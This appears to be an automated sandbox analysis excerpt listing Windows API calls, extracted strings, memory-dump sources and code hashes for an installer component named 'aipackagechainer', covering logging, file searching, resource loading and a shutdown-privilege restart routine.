                                          • FlushFileBuffers.KERNEL32(00000000,?,0000001C), ref: 00088B40
                                            • Part of subcall function 000651E0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,?,00092CA5,-00000010,?,?,?,D11C52E5,?,00000000,?,00000000), ref: 00065203
                                          • OutputDebugStringW.KERNEL32(00000000,?,0000001D), ref: 00088CE3
                                          • WriteFile.KERNEL32(00000000,00000000,00000002,00000000,00000000,?,0000001D), ref: 00088D69
                                          • FlushFileBuffers.KERNEL32(00000000,?,0000001D), ref: 00088D74
                                          • WriteFile.KERNEL32(00000000,000885DD,000000FC,000000FF,00000000,0010C440,00000002,?,00000000,CPU: ,00000005), ref: 00088DE8
                                          • FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001C), ref: 00088DF1
                                          • WriteFile.KERNEL32(00000000,000000B7,?,000000FF,00000000,0010C440,00000002), ref: 00088E76
                                          • FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001C), ref: 00088E7F
                                            • Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: File$BuffersFlushWrite$DebugOutputString$CreateErrorFindHeapLastPointerProcessResource
                                          • String ID: CPU: $LOGGER->Creating LOG file at:$LOGGER->Reusing LOG file at:$LOGGER->failed to create LOG at:$OS Version: %u.%u.%u SP%u (%s) [%s]$server$workstation$x64$x86
                                          • API String ID: 611875259-1312762833
                                          • Opcode ID: ab8775db1e26342354b6978984f1229e3a94b04ae8854790332a2e916af0553f
                                          • Instruction ID: 47b5966c6974b870f0603ba8424609d1692269add2320ac2b58a62273ad34468
                                          • Opcode Fuzzy Hash: ab8775db1e26342354b6978984f1229e3a94b04ae8854790332a2e916af0553f
                                          • Instruction Fuzzy Hash: E312AA70A01609DFEB10DF68CD49BAABBB5FF44314F548268E845AB2E2DB74DD04CB90
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000C7E0F
                                          • GetLastError.KERNEL32 ref: 000C7E1A
                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C8590
                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C85D6
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C871A
                                          • SetEvent.KERNEL32(?), ref: 000C8794
                                          • GetLastError.KERNEL32 ref: 000C87A2
                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C8B02
                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C8B56
                                          • WaitForSingleObject.KERNEL32(00000001,000000FF), ref: 000C8B6F
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C8B7A
                                          • EnterCriticalSection.KERNEL32(?), ref: 000C8C94
                                          • LeaveCriticalSection.KERNEL32(?), ref: 000C8D19
                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C8DB2
                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C8E06
                                          • SetEvent.KERNEL32(?), ref: 000C8E8D
                                          • GetLastError.KERNEL32 ref: 000C8EA1
                                          • SetEvent.KERNEL32(?), ref: 000C8EB2
                                          • GetLastError.KERNEL32 ref: 000C8EC2
                                          • SetEvent.KERNEL32(?), ref: 000C8EF4
                                          • GetLastError.KERNEL32 ref: 000C8F02
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CriticalSection$ErrorLast$EnterEventLeave$ObjectSingleWait
                                          • String ID:
                                          • API String ID: 3699643388-0
                                          • Opcode ID: fccbb4a8e78c932ba885079e64141279b97f27acb9435c6a5e37a9cf7e99488d
                                          • Instruction ID: f63fc3120db15e36ec307ead1673c22c870e0327f0c3317fe50b875e81cf221c
                                          • Opcode Fuzzy Hash: fccbb4a8e78c932ba885079e64141279b97f27acb9435c6a5e37a9cf7e99488d
                                          • Instruction Fuzzy Hash: E2B2BEB4A087418FD764CF69C580B5FBBE1BF88704F148A2EE99993350EB71A845CF46
                                          APIs
                                          • FindClose.KERNEL32(00000000), ref: 00081D5F
                                          • PathIsUNCW.SHLWAPI(00000000,*.*,00000000), ref: 00081E17
                                          • FindFirstFileW.KERNEL32(00000000,00000000,*.*,00000000), ref: 00081F6B
                                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00081F85
                                          • GetFullPathNameW.KERNEL32(00000000,00000000,?,00000000), ref: 00081FB8
                                          • FindClose.KERNEL32(00000000), ref: 00082027
                                          • SetLastError.KERNEL32(0000007B), ref: 00082035
                                          • _wcsrchr.LIBVCRUNTIME ref: 0008208B
                                          • _wcsrchr.LIBVCRUNTIME ref: 000820AB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: FindPath$CloseFullName_wcsrchr$ErrorFileFirstLast
                                          • String ID: 2Wup1Wu$*.*$\\?\$\\?\UNC\
                                          • API String ID: 726989864-2365612532
                                          • Opcode ID: 8a8111bb6bb5eb062e13a3a5e424abe75164257e84b469809487d7194c593430
                                          • Instruction ID: 7a7d6994edbf64f127cff1f1c095db237489ef977354af9cda98da0ece5c2e30
                                          • Opcode Fuzzy Hash: 8a8111bb6bb5eb062e13a3a5e424abe75164257e84b469809487d7194c593430
                                          • Instruction Fuzzy Hash: 0BD1D370600602DFDB14EF68CC99BAEB7E5FF14314F208628E995DB2E2EB759941CB40
                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 000B192D
                                          • GetProcessAffinityMask.KERNEL32(00000000), ref: 000B1934
                                          • GetSystemInfo.KERNEL32(?), ref: 000B19B5
                                          • GetModuleHandleA.KERNEL32 ref: 000B1A04
                                          • GetProcAddress.KERNEL32(00000000), ref: 000B1A0B
                                          • GlobalMemoryStatus.KERNEL32(?), ref: 000B1A5B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Process$AddressAffinityCurrentGlobalHandleInfoMaskMemoryModuleProcStatusSystem
                                          • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                                          • API String ID: 3120231856-802862622
                                          • Opcode ID: da66e89ac4eaefa1238deb81b48239aa6fd2088182b098e87d54579ae0a7b60b
                                          • Instruction ID: 1e728a9282cedf464235f1f9a4f2096a51042fdf1903c8c75c94247a9f95625e
                                          • Opcode Fuzzy Hash: da66e89ac4eaefa1238deb81b48239aa6fd2088182b098e87d54579ae0a7b60b
                                          • Instruction Fuzzy Hash: BB718BB2A083118FD708CF59D89479BB7E5BBC8300F49892DE899C7351E7B4D904CB82
                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000060,D11C52E5,8007000E,00000000,?,?,?,?,?,?,?,?,000F1735,000000FF), ref: 00080A82
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,?,?,?,?,?,?,?,?,000F1735,000000FF), ref: 00080A91
                                          • FindResourceW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,000F1735,000000FF), ref: 00080AAF
                                          • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,000F1735,000000FF), ref: 00080AC7
                                            • Part of subcall function 0007EDE0: GetLastError.KERNEL32(D11C52E5,00000000,000EBD60,000000FF,?,8007000E), ref: 0007EE02
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,000F1735,000000FF), ref: 00080BAA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$Resource$ErrorFindFreeLast
                                          • String ID: Module$Module_Raw$REGISTRY
                                          • API String ID: 328770362-549000027
                                          • Opcode ID: 8962b4593e4ebaa96291a0df1d25168d5a025d2a12ab11a90e487d996ae696f8
                                          • Instruction ID: a71f6dbc92545f99dffe6bf4aa15af6347d34a175679c6cbfe5cc9ea17e17271
                                          • Opcode Fuzzy Hash: 8962b4593e4ebaa96291a0df1d25168d5a025d2a12ab11a90e487d996ae696f8
                                          • Instruction Fuzzy Hash: C851E170901249EFDB60EF54C844BEE77F4FF48314F108129FA45AB281DB749A44CBA5
                                          APIs
                                          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,?), ref: 000B303E
                                          • CloseHandle.KERNEL32(00000000), ref: 000B3050
                                          • GetLastError.KERNEL32 ref: 000B305A
                                          • CloseHandle.KERNEL32(FFFFFFFF), ref: 000B309A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CloseHandle$CreateErrorFileLast
                                          • String ID: $$NUMBER_OF_PROCESSORS$\
                                          • API String ID: 3884794734-458196154
                                          • Opcode ID: fba1ec4f68979367403de95a18d4e2f336dfd54fc9dfa7bda53ec14ed2da1e68
                                          • Instruction ID: d364b83467a241d66cdd07e8fd42bf18391743d4580e18459b294236ca78bd43
                                          • Opcode Fuzzy Hash: fba1ec4f68979367403de95a18d4e2f336dfd54fc9dfa7bda53ec14ed2da1e68
                                          • Instruction Fuzzy Hash: BC723870900268DBDB24DF68C855BDDBBF0BF04714F1482E9E489A7292DB75AE84DF90
                                          APIs
                                            • Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925
                                          • _wcsrchr.LIBVCRUNTIME ref: 000A391D
                                          • _wcsrchr.LIBVCRUNTIME ref: 000A3945
                                          • GetLogicalDriveStringsW.KERNEL32(00000064,?), ref: 000A399E
                                          • GetDriveTypeW.KERNEL32(?), ref: 000A39BA
                                          • Wow64DisableWow64FsRedirection.KERNEL32(00000000,00000000), ref: 000A3A41
                                          • Wow64RevertWow64FsRedirection.KERNEL32(00000000,00000000), ref: 000A3CA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Wow64$DriveRedirection_wcsrchr$DisableHeapLogicalProcessRevertStringsType
                                          • String ID: 2Wup1Wu$]%!$p2Wu3Wu
                                          • API String ID: 1737443197-2445596722
                                          • Opcode ID: d27aa662813c62053f1bb42db05693e6437136551ac9e779a7180730a9b27ce4
                                          • Instruction ID: ad725a2220b91e1104f2148d750013be1e91b0e5b80668a1a59ccf750542c6c2
                                          • Opcode Fuzzy Hash: d27aa662813c62053f1bb42db05693e6437136551ac9e779a7180730a9b27ce4
                                          • Instruction Fuzzy Hash: C6F1B331900659CFDB24DB68CC48BEDF7B5AF05310F0486E9E55AAB292DB749E84CF90
                                          APIs
                                          • GetForegroundWindow.USER32(D11C52E5,00000000,?,?), ref: 0006C182
                                          • MessageBoxW.USER32(00000000,?,00000000,00000044), ref: 0006C18D
                                          • GetCurrentProcess.KERNEL32 ref: 0006C241
                                          • OpenProcessToken.ADVAPI32(00000000,00000028,00000000), ref: 0006C24E
                                          • CloseHandle.KERNEL32(00000000), ref: 0006C26E
                                          • GetLastError.KERNEL32 ref: 0006C2B3
                                          • ExitWindowsEx.USER32(00000006,80040002), ref: 0006C2C4
                                          • CloseHandle.KERNEL32(00000000), ref: 0006C2E4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CloseHandleProcess$CurrentErrorExitForegroundLastMessageOpenTokenWindowWindows
                                          • String ID: SeShutdownPrivilege
                                          • API String ID: 1440564136-3733053543
                                          • Opcode ID: 35096a31da82d46ef6e43caa3276be28c0ad215d9ecb0a2e139682101161ef06
                                          • Instruction ID: d60244e1ab28bf2fac2367965fc124099d349d26443cc9b33c2d8fae4b2289db
                                          • Opcode Fuzzy Hash: 35096a31da82d46ef6e43caa3276be28c0ad215d9ecb0a2e139682101161ef06
                                          • Instruction Fuzzy Hash: 2E515370901245DBEB10DFA8C948B9EBBF5EF49720F248259E815BB2D1DB749D44CB60
                                          APIs
                                            • Part of subcall function 000CC839: EnterCriticalSection.KERNEL32(00128FDC,?,00000000,?,00063976,001298D8,D11C52E5,00000000,?,000EBD9D,000000FF,?,0009D1A5,D11C52E5,?,00000000), ref: 000CC844
                                            • Part of subcall function 000CC839: LeaveCriticalSection.KERNEL32(00128FDC,?,00063976,001298D8,D11C52E5,00000000,?,000EBD9D,000000FF,?,0009D1A5,D11C52E5,?,00000000), ref: 000CC881
                                          • GetStdHandle.KERNEL32(000000F5,?,?,?), ref: 0008BE7A
                                          • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?), ref: 0008BE81
                                          • GetStdHandle.KERNEL32(000000F5,0000000C,?,?), ref: 0008BE95
                                          • SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 0008BE9C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ConsoleCriticalHandleSection$AttributeBufferEnterInfoLeaveScreenText
                                          • String ID: Error
                                          • API String ID: 2673574109-2619118453
                                          • Opcode ID: be160a890efa86710e940332030daab6b8fa03a5cf784028ccb66329de02da1f
                                          • Instruction ID: 1a0604f9db2ddc04d5e62bce0d69807c69a9a2a6ca3e9152579d2757852c2d46
                                          • Opcode Fuzzy Hash: be160a890efa86710e940332030daab6b8fa03a5cf784028ccb66329de02da1f
                                          • Instruction Fuzzy Hash: A6429B70D0021ADFEB24DFA8CC44BEDBBB1BF44314F1042A9E459A7692E7746A85CF90
                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,D11C52E5,00000000,00000000,?), ref: 0008CDBB
                                          • GetTempFileNameW.KERNEL32(?,shim_clone,00000000,?,?,00000000,00000000), ref: 0008CF24
                                          • Wow64DisableWow64FsRedirection.KERNEL32(00000000,?,?,00000000,00000000), ref: 0008CFC4
                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,00000000,00000000), ref: 0008CFE6
                                          • Wow64RevertWow64FsRedirection.KERNEL32(00000000,?,?,00000000), ref: 0008D06F
                                          • DeleteFileW.KERNEL32(?,D11C52E5,00000000,00000000,000EBBB0,000000FF,?,80004005,?), ref: 0008D17D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Wow64$File$Redirection$CopyDeleteDisableFolderNamePathRevertTemp
                                          • String ID: p1Wu$shim_clone
                                          • API String ID: 3507832535-294939748
                                          • Opcode ID: 930c00ed0acd177ea0cc472180bdf73ff9ef43b95dd1df5cbb3781fb02175762
                                          • Instruction ID: f75285a887b0e970898c72a35429c0fcbb06ad146c780835c577d3925fc76dd4
                                          • Opcode Fuzzy Hash: 930c00ed0acd177ea0cc472180bdf73ff9ef43b95dd1df5cbb3781fb02175762
                                          • Instruction Fuzzy Hash: 81C1E170A002549FEB28AB24DC45BBAB7F4FF45300F1441ADE94A97292EB349E45CB64
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,00000000,-00000010,?,D11C52E5,?,00000000,00000000), ref: 000A614E
                                          • FindNextFileW.KERNEL32(?,00000000), ref: 000A6169
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: FileFind$FirstNext
                                          • String ID: 2Wup1Wu$p2Wu3Wu
                                          • API String ID: 1690352074-4124002120
                                          • Opcode ID: 954b6b59d39256aab3792428e5e628e5a7745a8ebca020b026e5660cf060c2fe
                                          • Instruction ID: fbfa105b07a52103663b3cc1cded37c0a36342b6db1da6933ecaf258812ef61f
                                          • Opcode Fuzzy Hash: 954b6b59d39256aab3792428e5e628e5a7745a8ebca020b026e5660cf060c2fe
                                          • Instruction Fuzzy Hash: 70814971D00648DFDB10DFA8CC48AEEBBF8FF09314F188159E815AB291DB759A44CBA1
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F5,?,?,?), ref: 0008BE7A
                                          • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?), ref: 0008BE81
                                          • GetStdHandle.KERNEL32(000000F5,0000000C,?,?), ref: 0008BE95
                                          • SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 0008BE9C
                                          • GetStdHandle.KERNEL32(000000F5,?,?,00000000,?,00000000,0010C440,00000002,?,?), ref: 0008BF2B
                                          • SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 0008BF32
                                          Strings
                                          • *** Stack Trace (x86) ***, xrefs: 0008B9E5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ConsoleHandle$AttributeText$BufferInfoScreen
                                          • String ID: *** Stack Trace (x86) ***
                                          • API String ID: 575076100-1035257212
                                          • Opcode ID: deae88dce9ee8b8f4959b134a7265b15cfaaa12abb75480793842261478486c1
                                          • Instruction ID: 2f76cd5d042bf6d9bf62cc3d51247e21217319a7de456aebef8b170561380b19
                                          • Opcode Fuzzy Hash: deae88dce9ee8b8f4959b134a7265b15cfaaa12abb75480793842261478486c1
                                          • Instruction Fuzzy Hash: FD12BB70900249DFDB24DFA8CC45BEEBBB0FF48324F204269E525A7691EB746A85CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: FileFindFirstHeapProcess
                                          • String ID: 2Wup1Wu$p2Wu3Wu
                                          • API String ID: 284326027-4124002120
                                          • Opcode ID: 0e85fbbbc8726a4661be4ba9e687bc46593c4a0b36efc5dd216fa28642e20c46
                                          • Instruction ID: 7a6b469ac317adbd0ea06c8d8c440644bb1cf6fb803598687e62f631f99f5a80
                                          • Opcode Fuzzy Hash: 0e85fbbbc8726a4661be4ba9e687bc46593c4a0b36efc5dd216fa28642e20c46
                                          • Instruction Fuzzy Hash: 8C81B175901218DFDB60DF68CC89B99B7F8EF45314F1482D9E418AB292DBB09E84CF91
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: __floor_pentium4
                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                          • API String ID: 4168288129-2761157908
                                          • Opcode ID: d77ab0fea438f151971fe4252e74f8fefa21118e845f28839a4792a4133b78a6
                                          • Instruction ID: 5646a8e54dcb83f301e7bd6e572537d6e14386a99b7dcef77febb02b8c946df2
                                          • Opcode Fuzzy Hash: d77ab0fea438f151971fe4252e74f8fefa21118e845f28839a4792a4133b78a6
                                          • Instruction Fuzzy Hash: D9D23672E086698FDB65CE29CD40BEAB7B5EB44304F1445EAD44DF7240EB78AE818F41
                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(0000000C,000CA28A,00000000,?,000CA422), ref: 000CA370
                                          • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,000CA422), ref: 000CA397
                                          • HeapAlloc.KERNEL32(00000000,?,000CA422), ref: 000CA39E
                                          • InitializeSListHead.KERNEL32(00000000,?,000CA422), ref: 000CA3AB
                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,000CA422), ref: 000CA3C0
                                          • HeapFree.KERNEL32(00000000,?,000CA422), ref: 000CA3C7
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
                                          • String ID:
                                          • API String ID: 1475849761-0
                                          • Opcode ID: fb4ef0fbda811add0d8f34199b43ebd48a031aaf23a4b3a401f15f9912fae552
                                          • Instruction ID: ca4d7aeb261677274848e5523a902b2b165ec80e3a11d1e4b7dddf117855621b
                                          • Opcode Fuzzy Hash: fb4ef0fbda811add0d8f34199b43ebd48a031aaf23a4b3a401f15f9912fae552
                                          • Instruction Fuzzy Hash: 76F04F317002819BFB619F79EC18F2A77E9AB85756F00052DFA42D3660EE748581DB52
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,?,D11C52E5,00000000), ref: 00061AB3
                                          • FindClose.KERNEL32(000000FF,?), ref: 00061C72
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
